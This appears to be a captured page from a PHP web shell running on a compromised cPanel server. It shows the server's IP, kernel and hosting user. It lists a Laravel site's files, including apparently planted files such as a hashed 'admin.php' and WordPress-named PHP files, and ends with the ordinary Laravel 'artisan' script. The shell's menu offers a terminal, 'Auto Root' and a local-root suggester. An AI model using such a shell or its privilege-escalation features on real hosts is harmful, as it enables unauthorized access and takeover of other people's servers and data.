Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-05-08 05:45
Modules
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
ap.tsgbd.com
[ DIR ]
drwxr-x---
2025-12-19 05:42
app
[ DIR ]
drwxr-xr-x
2025-12-18 19:12
bb
[ DIR ]
drwxr-xr-x
2025-12-19 06:05
bootstrap
[ DIR ]
drwxr-xr-x
2025-12-18 19:46
config
[ DIR ]
drwxr-xr-x
2025-12-18 19:20
database
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
lang
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
public
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
resources
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
routes
[ DIR ]
drwxr-xr-x
2025-12-18 19:40
soft
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
storage
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
tests
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
vendor
[ DIR ]
drwxr-xr-x
2025-12-18 07:34
.env
2.32
KB
-rw-r--r--
2025-08-12 13:45
.env.example
2.17
KB
-rw-r--r--
2025-02-06 04:36
.gitattributes
111
B
-rw-r--r--
2025-02-06 04:36
.gitignore
462
B
-rw-r--r--
2025-02-06 04:36
.htaccess
197
B
-r--r--r--
2025-12-18 07:34
.php_cs
470
B
-rw-r--r--
2025-02-06 04:36
.prettierrc
98
B
-rw-r--r--
2025-02-06 04:36
.shift
131
B
-rw-r--r--
2025-02-06 04:36
.user.ini
590
B
-rw-r--r--
2025-11-19 15:04
16940c9f59d303admin.php
9.25
KB
-rw-r--r--
2025-12-16 02:54
ap.tsgbd.com.zip
302.8
MB
-rw-r--r--
2025-08-12 11:52
artisan
1.65
KB
-rw-r--r--
2025-02-06 04:36
composer.json
3.39
KB
-rw-r--r--
2025-02-06 04:36
composer.lock
481.94
KB
-rw-r--r--
2025-02-06 04:36
google529f143b8ae8a1d2.html
53
B
-rw-r--r--
2022-03-23 19:32
modules_statuses.json
469
B
-rw-r--r--
2025-02-06 04:36
php.ini
584
B
-rw-r--r--
2025-11-19 15:04
phpunit.xml
1.15
KB
-rw-r--r--
2025-02-06 04:36
readme.md
757
B
-rw-r--r--
2025-02-06 04:36
readme.pdf
19.33
KB
-rw-r--r--
2025-02-06 04:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__ . '/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);